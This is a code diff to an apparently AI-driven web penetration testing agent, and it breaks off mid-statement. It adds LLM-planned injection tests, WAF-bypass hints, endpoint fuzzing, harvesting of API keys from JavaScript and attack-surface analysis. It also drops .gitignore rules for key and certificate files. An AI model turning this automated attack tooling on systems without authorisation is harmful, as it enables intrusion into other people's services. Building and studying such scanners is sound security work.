diff --git a/.gitignore b/.gitignore index 70144dd..db1d09b 100644 --- a/.gitignore +++ b/.gitignore @@ -78,48 +78,3 @@ docker/*.env # Results (runtime output) # ============================== results/ - -# ============================== -# Runtime State & Learning Data -# ============================== -data/providers.json -data/reasoning_memory.json -data/adaptive_learning.json -data/vectorstore/ -data/checkpoints/ -data/scans/ -data/custom-knowledge/uploads/ - -# ============================== -# Reports & Benchmarks -# ============================== -reports/benchmark_results/ -reports/*.json - -# ============================== -# Training Data & Archives -# ============================== -*.jsonl -*.zip -*.tar.gz -*.rar -*.pkl -*.pickle - -# ============================== -# Certificates & VPN -# ============================== -*.pem -*.key -*.crt -*.p12 -*.ovpn - -# ============================== -# Temporary -# ============================== -tmp/ -*.tmp -*.sock -*.socket -*.pid diff --git a/backend/core/autonomous_agent.py b/backend/core/autonomous_agent.py index 3c3e865..2f0a698 100755 --- a/backend/core/autonomous_agent.py +++ b/backend/core/autonomous_agent.py @@ -2511,6 +2511,429 @@ Respond in JSON: } return None + # ── AI Deep Test: Iterative Human-Pentester Loop ───────────────────── + + MAX_DEEP_TEST_ITERATIONS = 3 + + async def _ai_deep_test( + self, + url: str, + vuln_type: str, + params: List[str], + method: str = "GET", + form_defaults: Dict = None, + ) -> Optional[Finding]: + """AI-driven iterative testing loop — the core of LLM-as-VulnEngine. + + Unlike hardcoded payload iteration, this method: + 1. OBSERVES — builds rich context (baseline, tech, WAF, playbook, memory) + 2. PLANS — asks LLM to generate targeted test cases + 3. EXECUTES — sends requests, captures full responses + 4. ANALYZES — LLM reviews actual responses with anti-hallucination + 5. ADAPTS — if promising signals found, loops with refined tests + + All confirmed findings go through _judge_finding() (ValidationJudge pipeline). + Returns the first confirmed Finding, or None. + """ + if not self.llm.is_available() or not self.session: + return None + + if self.is_cancelled(): + return None + + # Token budget check — skip if budget exhausted + if self.token_budget and hasattr(self.token_budget, 'should_skip'): + if self.token_budget.should_skip("deep_test"): + return None + + await self.log("debug", f" [AI-DEEP] {vuln_type} on {url[:60]}...") + + # Step 1: OBSERVE — Build rich context + context = self._build_deep_test_context( + url, vuln_type, params, method, form_defaults + ) + + # Playbook context + playbook_ctx = "" + if HAS_PLAYBOOK: + try: + entry = get_playbook_entry(vuln_type) + if entry: + prompts = get_testing_prompts(vuln_type) + bypass = get_bypass_strategies(vuln_type) + anti_fp = get_anti_fp_rules(vuln_type) + playbook_ctx = f"\n## PLAYBOOK METHODOLOGY for {vuln_type}\n" + playbook_ctx += f"Overview: {entry.get('overview', '')}\n" + if prompts: + playbook_ctx += "Testing prompts:\n" + for p in prompts[:5]: + playbook_ctx += f" - {p}\n" + if bypass: + playbook_ctx += f"Bypass strategies: {', '.join(bypass[:5])}\n" + if anti_fp: + playbook_ctx += f"Anti-FP rules: {', '.join(anti_fp[:3])}\n" + except Exception: + pass + + # Import the prompt builders + try: + from backend.core.vuln_engine.ai_prompts import ( + get_deep_test_plan_prompt, get_deep_test_analysis_prompt + ) + except ImportError: + return None + + previous_results_json = "" + all_test_results = [] + + for iteration in range(1, self.MAX_DEEP_TEST_ITERATIONS + 1): + if self.is_cancelled(): + return None + + # Step 2: PLAN — AI generates targeted test cases + plan_prompt = get_deep_test_plan_prompt( + vuln_type=vuln_type, + context=context, + playbook_ctx=playbook_ctx, + iteration=iteration, + previous_results=previous_results_json, + ) + + try: + plan_response = await self.llm.generate( + plan_prompt, + self._get_enhanced_system_prompt("deep_testing", vuln_type) + ) + except Exception as e: + await self.log("debug", f" [AI-DEEP] Plan error round {iteration}: {e}") + break + + # Parse plan JSON + plan_match = re.search(r'\{[\s\S]*\}', plan_response) + if not plan_match: + await self.log("debug", f" [AI-DEEP] No JSON in plan response round {iteration}") + break + + try: + plan = json.loads(plan_match.group()) + except json.JSONDecodeError: + await self.log("debug", f" [AI-DEEP] JSON parse error round {iteration}") + break + + tests = plan.get("tests", []) + if not tests: + await self.log("debug", f" [AI-DEEP] No tests generated round {iteration}") + break + + reasoning = plan.get("reasoning", "") + if reasoning and iteration == 1: + await self.log("info", f" [AI-DEEP] Strategy: {reasoning[:120]}") + + # Step 3: EXECUTE — Send requests, capture full responses + round_results = await self._execute_ai_planned_tests(tests, url, method) + all_test_results.extend(round_results) + + if not round_results: + break + + # Build baseline string for analysis + baseline_str = "" + baseline_resp = self.memory.get_baseline(url) + if baseline_resp: + baseline_str = ( + f"Status: {baseline_resp.get('status', '?')}\n" + f"Headers: {json.dumps(dict(list(baseline_resp.get('headers', {}).items())[:10]), default=str)}\n" + f"Body preview: {baseline_resp.get('body', '')[:500]}\n" + f"Body length: {len(baseline_resp.get('body', ''))}" + ) + + # Step 4: ANALYZE — AI reviews actual responses + results_json = json.dumps(round_results[:5], indent=2, default=str)[:6000] + + analysis_prompt = get_deep_test_analysis_prompt( + vuln_type=vuln_type, + test_results=results_json, + baseline=baseline_str, + iteration=iteration, + ) + + try: + analysis_response = await self.llm.generate( + analysis_prompt, + self._get_enhanced_system_prompt("confirmation", vuln_type) + ) + except Exception as e: + await self.log("debug", f" [AI-DEEP] Analysis error round {iteration}: {e}") + break + + # Parse analysis JSON + analysis_match = re.search(r'\{[\s\S]*\}', analysis_response) + if not analysis_match: + break + + try: + analysis = json.loads(analysis_match.group()) + except json.JSONDecodeError: + break + + # Step 5: Check for confirmed findings + for finding_data in analysis.get("analysis", []): + if not finding_data.get("is_vulnerable"): + continue + if finding_data.get("confidence") not in ("high", "medium"): + continue + + evidence = finding_data.get("evidence", "") + test_name = finding_data.get("test_name", "AI Deep Test") + + # Find matching test result for endpoint + response + affected_endpoint = url + matched_body = "" + matched_resp = None + for tr in all_test_results: + if tr.get("test_name") == test_name or tr.get("name") == test_name: + affected_endpoint = tr.get("url", url) + matched_body = tr.get("body_preview", "") + matched_resp = tr + break + + # Anti-hallucination: verify evidence exists in actual response + if evidence and matched_body: + if not self._evidence_in_response(evidence, matched_body): + await self.log("debug", + f" [AI-DEEP] REJECTED: evidence not grounded in response for {test_name}") + self.memory.reject_finding( + type("F", (), { + "vulnerability_type": vuln_type, + "affected_endpoint": affected_endpoint, + "parameter": "" + })(), + f"AI evidence not in response: {evidence[:100]}" + ) + continue + + # Extract payload from matching test + payload = "" + param_name = "" + if matched_resp: + payload = matched_resp.get("payload", "") + param_name = matched_resp.get("param", params[0] if params else "") + + # Run through ValidationJudge pipeline + finding = await self._judge_finding( + vuln_type, affected_endpoint, param_name or (params[0] if params else ""), + payload, evidence, matched_resp or {}, + baseline=baseline_resp + ) + if finding: + await self.log("warning", + f" [AI-DEEP] CONFIRMED {vuln_type} round {iteration}: " + f"{finding_data.get('confidence')} confidence") + return finding + + # Step 6: ADAPT — decide whether to continue + if not analysis.get("continue_testing", False): + await self.log("debug", + f" [AI-DEEP] {vuln_type}: done after round {iteration} " + f"({analysis.get('summary', 'no findings')})") + break + + # Prepare previous results for next iteration + previous_results_json = results_json + next_strategy = analysis.get("next_round_strategy", "") + if next_strategy: + await self.log("debug", f" [AI-DEEP] Round {iteration + 1} strategy: {next_strategy[:80]}") + + return None + + def _build_deep_test_context( + self, + url: str, + vuln_type: str, + params: List[str], + method: str, + form_defaults: Dict = None, + ) -> str: + """Build rich observation context for the AI deep test loop. + + Combines: endpoint details, baseline, tech stack, WAF info, + parameter analysis, and memory of previous tests. + """ + parsed = urlparse(url) + base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" + + # Endpoint details + parts = [ + f"TARGET URL: {url}", + f"BASE URL: {base_url}", + f"METHOD: {method}", + f"PARAMETERS: {', '.join(params[:10]) if params else 'none discovered'}", + ] + + if form_defaults: + parts.append(f"FORM DEFAULTS: {json.dumps(form_defaults, default=str)[:300]}") + + # Technology stack + if self.recon.technologies: + parts.append(f"TECHNOLOGIES: {', '.join(self.recon.technologies[:10])}") + + # Baseline response + baseline = self.memory.get_baseline(url) or self.memory.get_baseline(base_url) + if baseline: + parts.append(f"\nBASELINE RESPONSE:") + parts.append(f" Status: {baseline.get('status', '?')}") + parts.append(f" Content-Type: {baseline.get('content_type', '?')}") + parts.append(f" Body length: {len(baseline.get('body', ''))}") + body_preview = baseline.get('body', '')[:300] + if body_preview: + parts.append(f" Body preview: {body_preview}") + + # WAF information + if self._waf_result and self._waf_result.detected_wafs: + waf_names = [w.get('name', '?') if isinstance(w, dict) else str(w) + for w in self._waf_result.detected_wafs] + parts.append(f"\nWAF DETECTED: {', '.join(waf_names)}") + if self.waf_detector: + try: + bypasses = self.waf_detector.get_bypass_techniques(self._waf_result) + if bypasses: + parts.append(f"WAF BYPASS TECHNIQUES: {', '.join(bypasses[:5])}") + except Exception: + pass + + # Parameter analysis + if self.param_analyzer and params: + try: + param_dict = {p: "" for p in params[:5]} + ranked = self.param_analyzer.rank_parameters(param_dict) + param_info = [] + for name, score, vulns in ranked[:5]: + param_info.append(f" {name}: risk={score:.1f}, likely_vulns={vulns[:3]}") + if param_info: + parts.append(f"\nPARAMETER RISK ANALYSIS:") + parts.extend(param_info) + except Exception: + pass + + # Memory: what was already tested + tested_payloads = [] + for p in params[:3]: + if self.memory.was_tested(url, p, vuln_type) or self.memory.was_tested(base_url, p, vuln_type): + tested_payloads.append(f" {p}: already tested (skip)") + if tested_payloads: + parts.append(f"\nPREVIOUSLY TESTED (from memory):") + parts.extend(tested_payloads) + + # RAG context + if self.rag_engine: + try: + rag_ctx = self._get_rag_testing_context(vuln_type, url) + if rag_ctx: + parts.append(f"\nRAG CONTEXT (historical patterns):") + parts.append(rag_ctx[:500]) + except Exception: + pass + + return "\n".join(parts) + + async def _execute_ai_planned_tests( + self, tests: List[Dict], default_url: str, default_method: str + ) -> List[Dict]: + """Execute AI-planned test cases, return results with full responses. + + Reuses _make_request() and _make_request_with_injection() for HTTP calls. + """ + results = [] + + for test in tests[:5]: + if self.is_cancelled(): + break + + test_url = test.get("url", default_url) + test_method = test.get("method", default_method).upper() + test_params = test.get("params", {}) + test_headers = test.get("headers", {}) + test_body = test.get("body", "") + test_name = test.get("name", "unnamed") + injection_point = test.get("injection_point", "parameter") + content_type = test.get("content_type", "") + + try: + start_time = asyncio.get_event_loop().time() + + if injection_point == "header" and test_headers: + # Use header injection for header-based tests + header_name = list(test_headers.keys())[0] if test_headers else "X-Test" + payload = test_headers.get(header_name, "") + resp = await self._make_request_with_injection( + test_url, test_method, payload, + injection_point="header", header_name=header_name + ) + elif injection_point == "body" and test_body: + # Body injection + resp = await self._make_request_with_injection( + test_url, "POST", test_body, + injection_point="body", param_name="data" + ) + elif test_params: + # Parameter injection (default) + resp = await self._make_request(test_url, test_method, test_params) + else: + # Plain request + resp = await self._make_request(test_url, test_method, {}) + + elapsed = asyncio.get_event_loop().time() - start_time + + if resp: + # Extract the payload used for finding creation + payload_used = "" + param_used = "" + if test_params: + for k, v in test_params.items(): + if v and len(str(v)) > 3: + payload_used = str(v) + param_used = k + break + + result = { + "test_name": test_name, + "name": test_name, + "url": test_url, + "method": test_method, + "status": resp.get("status", 0), + "headers": {k: v for k, v in list(resp.get("headers", {}).items())[:15]}, + "body_preview": resp.get("body", "")[:1500], + "body_length": len(resp.get("body", "")), + "response_time": round(elapsed, 3), + "payload": payload_used, + "param": param_used, + } + results.append(result) + else: + results.append({ + "test_name": test_name, + "name": test_name, + "url": test_url, + "method": test_method, + "status": 0, + "error": "No response", + "body_preview": "", + "body_length": 0, + }) + + except Exception as e: + results.append({ + "test_name": test_name, + "name": test_name, + "url": test_url, + "error": str(e), + "status": 0, + "body_preview": "", + "body_length": 0, + }) + + return results + async def _ai_test_fallback(self, user_prompt: str): """Fallback testing when LLM is not available - uses keyword detection""" await self.log("info", f" Running fallback tests for: {user_prompt}") @@ -4204,6 +4627,28 @@ NOT_VULNERABLE: """ self._playbook_recommended_types: List[str] = [] self._current_playbook_context: str = "" + # ── PRE-STREAM AI MASTER PLAN ── + # Before launching parallel streams, ask AI for a strategic master plan + # that provides context and direction for all 3 streams. + self._master_plan: Dict = {} + if self.llm.is_available(): + try: + await self.log("info", "[MASTER PLAN] AI strategic planning before streams") + master_plan = await self._ai_master_plan() + if master_plan: + self._master_plan = master_plan + profile = master_plan.get("target_profile", "") + risk = master_plan.get("risk_assessment", "") + priority_types = master_plan.get("priority_vuln_types", []) + if profile: + await self.log("info", f" [MASTER PLAN] Profile: {profile[:120]}") + if risk: + await self.log("info", f" [MASTER PLAN] Risk: {risk[:120]}") + if priority_types: + await self.log("info", f" [MASTER PLAN] Priority: {', '.join(priority_types[:8])}") + except Exception as e: + await self.log("debug", f" [MASTER PLAN] Planning error: {e}") + # ── CONCURRENT PHASE (0-50%): 3 parallel streams ── await asyncio.gather( self._stream_recon(), # Stream 1: Recon pipeline @@ -4563,6 +5008,92 @@ NOT_VULNERABLE: """ await self._update_progress(100, "CLI Agent pentest complete") return report + # ── Pre-Stream AI Master Plan ── + + async def _ai_master_plan(self) -> Dict: + """Generate a strategic master plan before launching parallel streams. + + This gives all 3 streams shared context: what to look for, what to + prioritize, and what the target looks like from a security perspective. + """ + if not self.llm.is_available(): + return {} + + try: + from backend.core.vuln_engine.ai_prompts import get_master_plan_prompt + except ImportError: + return {} + + # Gather initial context from whatever recon we have so far + initial_response = "" + try: + resp = await self._make_request(self.target) + if resp: + status = resp.get("status", 0) + headers = resp.get("headers", {}) + body = resp.get("body", "") + server = headers.get("server", headers.get("Server", "")) + powered = headers.get("x-powered-by", headers.get("X-Powered-By", "")) + content_type = headers.get("content-type", headers.get("Content-Type", "")) + initial_response = ( + f"Status: {status}\n" + f"Server: {server}\n" + f"X-Powered-By: {powered}\n" + f"Content-Type: {content_type}\n" + f"Response size: {len(body)} bytes\n" + f"Key headers: {json.dumps({k: v for k, v in list(headers.items())[:10]}, default=str)}\n" + f"Body preview: {body[:500]}" + ) + except Exception: + pass + + tech_str = ", ".join(self.recon.technologies[:15]) if self.recon.technologies else "" + endpoints_str = "\n".join( + f" - {ep.get('url', ep) if isinstance(ep, dict) else ep}" + for ep in self.recon.endpoints[:20] + ) if self.recon.endpoints else "" + forms_str = "\n".join( + f" - {f.get('action', '?')} [{f.get('method', 'GET')}] params: {', '.join(f.get('inputs', []))}" + for f in self.recon.forms[:10] + ) if self.recon.forms else "" + waf_info = "" + if hasattr(self, '_waf_result') and self._waf_result and self._waf_result.detected_wafs: + waf_info = ", ".join(f"{w.name} ({w.confidence:.0%})" for w in self._waf_result.detected_wafs) + + # Playbook context + playbook_ctx = "" + if HAS_PLAYBOOK: + try: + summary = get_playbook_summary() + playbook_ctx = "\n## PLAYBOOK CATEGORIES\n" + "\n".join( + f"- {cat}: {', '.join(vts[:5])}" for cat, vts in summary.items() + ) + except Exception: + pass + + prompt = get_master_plan_prompt( + target=self.target, + initial_response=initial_response, + technologies=tech_str, + endpoints_preview=endpoints_str, + forms_preview=forms_str, + waf_info=waf_info, + playbook_context=playbook_ctx, + ) + + try: + resp_text = await self.llm.generate( + prompt, + system=self._get_enhanced_system_prompt("strategy") + ) + start = resp_text.index('{') + end = resp_text.rindex('}') + 1 + plan = json.loads(resp_text[start:end]) + return plan + except Exception as e: + await self.log("debug", f" [MASTER PLAN] Parse error: {e}") + return {} + # ── Stream 1: Recon Pipeline ── async def _stream_recon(self): @@ -4648,39 +5179,60 @@ NOT_VULNERABLE: """ except Exception as e: await self.log("debug", f" [WAF] Detection failed: {e}") - # ── Phase 6: Deep Recon (JS analysis, sitemap, robots, API enum) ── + # ── Phase 6: Deep Recon (JS, sitemap, robots, API, framework, fuzzing) ── if self.deep_recon: try: prev_ep_count = len(self.recon.endpoints) - # Parse sitemap + robots + # Parse sitemap (now with recursive index following) sitemap_urls = await self.deep_recon.parse_sitemap(self.target) for surl in (sitemap_urls or []): if surl and surl.startswith("http"): self.recon.endpoints.append({"url": surl, "method": "GET"}) await self._endpoint_queue.put({"url": surl}) + if sitemap_urls: + await self.log("info", f" [DEEP RECON] Sitemap: {len(sitemap_urls)} URLs") - robots_urls = await self.deep_recon.parse_robots(self.target) - for rurl in (robots_urls or []): + # Parse robots.txt (now returns tuple: paths, sitemap_urls) + robots_result = await self.deep_recon.parse_robots(self.target) + if isinstance(robots_result, tuple): + robots_paths, robots_sitemaps = robots_result + else: + robots_paths, robots_sitemaps = robots_result or [], [] + for rurl in (robots_paths or []): if rurl and rurl.startswith("http"): self.recon.endpoints.append({"url": rurl, "method": "GET"}) await self._endpoint_queue.put({"url": rurl}) + if robots_paths: + await self.log("info", f" [DEEP RECON] Robots.txt: {len(robots_paths)} paths") - # API enumeration (Swagger/OpenAPI discovery) + # API enumeration (Swagger/OpenAPI/GraphQL discovery) api_schema = await self.deep_recon.enumerate_api( self.target, self.recon.technologies ) if api_schema: for ep_info in getattr(api_schema, "endpoints", []): - if isinstance(ep_info, dict) and ep_info.get("path"): - full_url = urljoin(self.target, ep_info["path"]) - self.recon.api_endpoints.append(full_url) - await self._endpoint_queue.put({"url": full_url}) + if isinstance(ep_info, dict): + ep_path = ep_info.get("url") or ep_info.get("path", "") + if ep_path: + full_url = urljoin(self.target, ep_path) + self.recon.api_endpoints.append(full_url) + ep_method = ep_info.get("method", "GET") + ep_params = ep_info.get("params", []) + self.recon.endpoints.append({ + "url": full_url, "method": ep_method, "params": ep_params + }) + await self._endpoint_queue.put({ + "url": full_url, "method": ep_method, "params": ep_params + }) + if api_schema.endpoints: + await self.log("info", f" [DEEP RECON] API schema ({api_schema.source}): " + f"{len(api_schema.endpoints)} endpoints") - # JS file analysis + # JS file analysis (enhanced: source maps, parameters, more patterns) if self.recon.js_files: js_result = await self.deep_recon.crawl_js_files( - self.target, self.recon.js_files[:20] + self.target, self.recon.js_files[:30] ) if js_result: for js_ep in getattr(js_result, "endpoints", []): @@ -4688,10 +5240,63 @@ NOT_VULNERABLE: """ full_url = urljoin(self.target, js_ep) self.recon.endpoints.append({"url": full_url}) await self._endpoint_queue.put({"url": full_url}) + # Log source map routes + if js_result.source_map_routes: + await self.log("info", f" [DEEP RECON] Source maps: " + f"{len(js_result.source_map_routes)} routes from .map files") + # Store discovered JS parameters + if js_result.parameters: + for param_ep, params in js_result.parameters.items(): + for p in params: + if p not in self.recon.parameters: + self.recon.parameters[p] = None + if js_result.endpoints: + await self.log("info", f" [DEEP RECON] JS analysis: " + f"{len(js_result.endpoints)} endpoints, " + f"{len(js_result.api_keys)} keys, " + f"{len(js_result.internal_urls)} internal URLs") + # Store discovered secrets/keys for reporting + if js_result.api_keys: + for key in js_result.api_keys: + await self.log("info", f" [DEEP RECON] Found API key: {key[:8]}...{key[-4:]}") + + # Framework-specific endpoint discovery + try: + from backend.core.deep_recon import EndpointInfo + fw_endpoints = await self.deep_recon.discover_framework_endpoints( + self.target, self.recon.technologies + ) + for fw_ep in (fw_endpoints or []): + if isinstance(fw_ep, EndpointInfo): + self.recon.endpoints.append({"url": fw_ep.url, "method": fw_ep.method}) + await self._endpoint_queue.put({ + "url": fw_ep.url, "method": fw_ep.method, + "source": fw_ep.source, "ai_priority": fw_ep.priority >= 7, + }) + if fw_endpoints: + await self.log("info", f" [DEEP RECON] Framework discovery: " + f"{len(fw_endpoints)} live endpoints") + except Exception as e: + await self.log("debug", f" [DEEP RECON] Framework discovery error: {e}") + + # API pattern fuzzing (infer endpoints from known patterns) + try: + known_urls = [ep["url"] if isinstance(ep, dict) else str(ep) + for ep in self.recon.endpoints if ep] + fuzzed = await self.deep_recon.fuzz_api_patterns(self.target, known_urls) + for fz_ep in (fuzzed or []): + if isinstance(fz_ep, EndpointInfo): + self.recon.endpoints.append({"url": fz_ep.url, "method": fz_ep.method}) + await self._endpoint_queue.put({"url": fz_ep.url}) + if fuzzed: + await self.log("info", f" [DEEP RECON] API fuzzing: " + f"{len(fuzzed)} inferred endpoints alive") + except Exception as e: + await self.log("debug", f" [DEEP RECON] API fuzzing error: {e}") new_eps = len(self.recon.endpoints) - prev_ep_count if new_eps > 0: - await self.log("info", f" [DEEP RECON] Discovered {new_eps} additional endpoints") + await self.log("info", f" [DEEP RECON] Total: {new_eps} new endpoints discovered") except Exception as e: await self.log("debug", f" [DEEP RECON] Error: {e}") @@ -4763,6 +5368,56 @@ NOT_VULNERABLE: """ except Exception as e: await self.log("debug", f" [SITE ANALYZER] Error: {e}") + # ── Phase 9: AI Endpoint Analysis ── + # After all recon, ask AI to analyze the full attack surface + if self.llm.is_available() and self.recon.endpoints and not self.is_cancelled(): + try: + await self.log("info", " [STREAM 1] AI analyzing attack surface...") + recon_analysis = await self._ai_analyze_recon() + if recon_analysis: + # Feed high-priority endpoints back into queue for junior testing + for hp in recon_analysis.get("high_priority_endpoints", [])[:10]: + hp_url = hp.get("url", "") + if hp_url and hp_url.startswith("http"): + await self._endpoint_queue.put({ + "url": hp_url, + "ai_priority": True, + "suggested_vulns": hp.get("suggested_vuln_types", []), + }) + # Probe hidden endpoints the AI suggests + for hidden in recon_analysis.get("hidden_endpoints_to_probe", [])[:5]: + hurl = hidden.get("url", "") + if hurl: + if not hurl.startswith("http"): + hurl = urljoin(self.target, hurl) + try: + probe_resp = await self._make_request(hurl) + if probe_resp and probe_resp.get("status", 0) not in (0, 404): + self.recon.endpoints.append({"url": hurl, "method": "GET"}) + await self._endpoint_queue.put({"url": hurl}) + await self.log("info", f" [AI RECON] Hidden endpoint found: {hurl} " + f"(status {probe_resp.get('status', '?')})") + except Exception: + pass + # Store tech-vuln mappings for later deep testing + tech_vulns = recon_analysis.get("tech_vuln_mapping", []) + if tech_vulns: + tech_recommended = [] + for tv in tech_vulns: + tech_recommended.extend(tv.get("vuln_types", [])) + if tech_recommended: + self._playbook_recommended_types = list(dict.fromkeys( + tech_recommended + self._playbook_recommended_types + )) + # Log summary + hp_count = len(recon_analysis.get("high_priority_endpoints", [])) + hidden_count = len(recon_analysis.get("hidden_endpoints_to_probe", [])) + chain_count = len(recon_analysis.get("attack_chains", [])) + await self.log("info", f" [AI RECON] Analysis: {hp_count} high-priority EPs, " + f"{hidden_count} hidden probes, {chain_count} attack chains") + except Exception as e: + await self.log("debug", f" [AI RECON] Analysis error: {e}") + ep_count = len(self.recon.endpoints) param_count = sum(len(v) if isinstance(v, list) else 1 for v in self.recon.parameters.values()) tech_count = len(self.recon.technologies) @@ -4773,6 +5428,56 @@ NOT_VULNERABLE: """ finally: self._recon_complete.set() + async def _ai_analyze_recon(self) -> Dict: + """AI analysis of reconnaissance results for Stream 1. + + Analyzes all discovered endpoints, parameters, forms, and technologies + to identify high-priority targets and hidden attack surfaces. + """ + try: + from backend.core.vuln_engine.ai_prompts import get_recon_analysis_prompt + except ImportError: + return {} + + endpoints_str = "\n".join( + f" - [{ep.get('method', 'GET')}] {ep.get('url', ep) if isinstance(ep, dict) else ep}" + for ep in self.recon.endpoints[:30] + ) + forms_str = "\n".join( + f" - {f.get('action', '?')} [{f.get('method', 'GET')}] " + f"inputs: {', '.join(f.get('inputs', []))}" + for f in self.recon.forms[:15] + ) + tech_str = ", ".join(self.recon.technologies[:20]) + params_str = "\n".join( + f" - {url}: {', '.join(p) if isinstance(p, list) else str(p)}" + for url, p in list(self.recon.parameters.items())[:15] + ) + js_str = "\n".join(f" - {js}" for js in self.recon.js_files[:10]) + api_str = "\n".join(f" - {api}" for api in self.recon.api_endpoints[:15]) + + prompt = get_recon_analysis_prompt( + target=self.target, + endpoints=endpoints_str, + forms=forms_str, + technologies=tech_str, + parameters=params_str, + js_files=js_str, + api_endpoints=api_str, + ) + + try: + resp_text = await self.llm.generate( + prompt, + system=self._get_enhanced_system_prompt("strategy") + ) + start = resp_text.index('{') + end = resp_text.rindex('}') + 1 + return json.loads(resp_text[start:end]) + except Exception as e: + await self.log("debug", f" [AI RECON] Parse error: {e}") + return {} + # ── Stream 2: Junior Pentester ── async def _stream_junior_pentest(self): @@ -4792,8 +5497,23 @@ NOT_VULNERABLE: """ "crlf_injection", "ssrf", "xxe", ] + # Use master plan priorities if available (from pre-stream AI planning) + if hasattr(self, '_master_plan') and self._master_plan: + master_priorities = self._master_plan.get("priority_vuln_types", []) + immediate = self._master_plan.get("testing_strategy", {}).get("immediate_tests", []) + if master_priorities or immediate: + # Merge: immediate first, then master priorities, then defaults + merged = list(dict.fromkeys( + [t for t in immediate if t in self.VULN_TYPE_MAP] + + [t for t in master_priorities if t in self.VULN_TYPE_MAP] + + priority_types + )) + priority_types = merged + await self.log("info", f" [STREAM 2] Using master plan priorities: " + f"{', '.join(priority_types[:8])}") + # Ask AI for initial prioritization (quick call) - if self.llm.is_available(): + if self.llm.is_available() and not (hasattr(self, '_master_plan') and self._master_plan.get("priority_vuln_types")): try: # Playbook: gather category overview for smarter prioritization playbook_hint = "" @@ -4939,11 +5659,6 @@ NOT_VULNERABLE: """ except Exception: pass - # Use limited payloads for speed - payloads = self._get_payloads(vuln_type)[:3] - if not payloads: - return - method = "GET" injection_config = self.VULN_INJECTION_POINTS.get(vuln_type, {"point": "parameter"}) inj_point = injection_config.get("point", "parameter") @@ -4951,43 +5666,124 @@ NOT_VULNERABLE: """ if inj_point == "both": inj_point = "parameter" - for param in params[:2]: - if self.is_cancelled(): - return - if self.memory.was_tested(url, param, vuln_type): - continue - for payload in payloads: + # ── AI-POWERED PAYLOAD GENERATION ── + # Ask AI to generate context-aware payloads instead of using hardcoded ones + ai_tests = [] + if self.llm.is_available(): + try: + from backend.core.vuln_engine.ai_prompts import get_junior_ai_test_prompt + + tech_ctx = ", ".join(self.recon.technologies[:10]) + waf_info = "" + if hasattr(self, '_waf_result') and self._waf_result and self._waf_result.detected_wafs: + waf_info = ", ".join(w.name for w in self._waf_result.detected_wafs) + + # Distill master plan context for this vuln type + master_ctx = "" + if hasattr(self, '_master_plan') and self._master_plan: + strategy = self._master_plan.get("testing_strategy", {}) + if vuln_type in self._master_plan.get("priority_vuln_types", []): + master_ctx = f"This vuln type is PRIORITY per master plan." + bypass = strategy.get("bypass_strategies", []) + if bypass: + master_ctx += f" Bypass strategies: {'; '.join(bypass[:2])}" + + prompt = get_junior_ai_test_prompt( + url=url, vuln_type=vuln_type, params=params, + method=method, tech_context=tech_ctx, + master_plan_context=master_ctx, waf_info=waf_info, + ) + ai_resp = await self.llm.generate( + prompt, + system=self._get_enhanced_system_prompt("testing", vuln_type) + ) + start_idx = ai_resp.index('{') + end_idx = ai_resp.rindex('}') + 1 + ai_data = json.loads(ai_resp[start_idx:end_idx]) + ai_tests = ai_data.get("tests", [])[:5] + except Exception: + pass # Fall back to hardcoded payloads + + # Execute AI-generated tests + if ai_tests: + for test in ai_tests: if self.is_cancelled(): return - header_name = "" - if inj_point == "header": - headers_list = injection_config.get("headers", ["X-Forwarded-For"]) - header_name = headers_list[0] if headers_list else "X-Forwarded-For" + t_param = test.get("param", params[0] if params else "id") + t_payload = test.get("payload", "") + t_method = test.get("method", method) + t_inj = test.get("injection_point", inj_point) + t_header = test.get("header_name", "") + if not t_payload: + continue + if self.memory.was_tested(url, t_param, vuln_type): + continue test_resp = await self._make_request_with_injection( - url, method, payload, - injection_point=inj_point, - param_name=param, - header_name=header_name, + url, t_method, t_payload, + injection_point=t_inj, + param_name=t_param, + header_name=t_header, ) if not test_resp: continue is_vuln, evidence = await self._verify_vulnerability( - vuln_type, payload, test_resp + vuln_type, t_payload, test_resp ) if is_vuln: - # Run through ValidationJudge pipeline finding = await self._judge_finding( - vuln_type, url, param, payload, evidence, test_resp, - injection_point=inj_point + vuln_type, url, t_param, t_payload, evidence, test_resp, + injection_point=t_inj ) if finding: await self._add_finding(finding) self._stream_findings_count += 1 - return # One finding per type per URL is enough for junior + return - self.memory.record_test(url, param, vuln_type, [payload], False) + self.memory.record_test(url, t_param, vuln_type, [t_payload], False) + else: + # ── FALLBACK: Hardcoded payloads when AI is unavailable ── + payloads = self._get_payloads(vuln_type)[:3] + if not payloads: + return + + for param in params[:2]: + if self.is_cancelled(): + return + if self.memory.was_tested(url, param, vuln_type): + continue + for payload in payloads: + if self.is_cancelled(): + return + header_name = "" + if inj_point == "header": + headers_list = injection_config.get("headers", ["X-Forwarded-For"]) + header_name = headers_list[0] if headers_list else "X-Forwarded-For" + + test_resp = await self._make_request_with_injection( + url, method, payload, + injection_point=inj_point, + param_name=param, + header_name=header_name, + ) + if not test_resp: + continue + + is_vuln, evidence = await self._verify_vulnerability( + vuln_type, payload, test_resp + ) + if is_vuln: + finding = await self._judge_finding( + vuln_type, url, param, payload, evidence, test_resp, + injection_point=inj_point + ) + if finding: + await self._add_finding(finding) + self._stream_findings_count += 1 + return + + self.memory.record_test(url, param, vuln_type, [payload], False) # ── Stream 3: Dynamic Tool Runner ── @@ -5150,12 +5946,89 @@ Respond ONLY with a JSON array: await self.log("info", f" [TOOL] {tool_name}: completed " f"({result.duration_seconds:.1f}s, no findings)") + # ── AI ANALYSIS of tool output ── + # Ask AI to analyze raw tool output for hidden insights + tool_output = (result.stdout or "") + "\n" + (result.stderr or "") + if self.llm.is_available() and tool_output.strip(): + try: + ai_analysis = await self._ai_analyze_tool_output( + tool_name, tool_output + ) + if ai_analysis: + # Process AI-identified real findings + for af in ai_analysis.get("real_findings", [])[:5]: + if af.get("confidence") in ("high", "medium"): + vtype = af.get("vulnerability_type", "vulnerability") + endpoint = af.get("endpoint", self.target) + if not self.memory.has_finding_for(vtype, endpoint, ""): + ai_tool_finding = { + "title": af.get("title", f"AI-{tool_name} finding"), + "severity": af.get("severity", "medium"), + "vulnerability_type": vtype, + "affected_endpoint": endpoint, + "evidence": af.get("evidence", ""), + } + await self._process_tool_finding(ai_tool_finding, tool_name) + + # Queue follow-up tests for junior stream + for ft in ai_analysis.get("follow_up_tests", [])[:3]: + ft_url = ft.get("endpoint", "") + if ft_url and ft_url.startswith("http") and hasattr(self, '_endpoint_queue'): + await self._endpoint_queue.put({ + "url": ft_url, + "ai_priority": True, + "suggested_vulns": 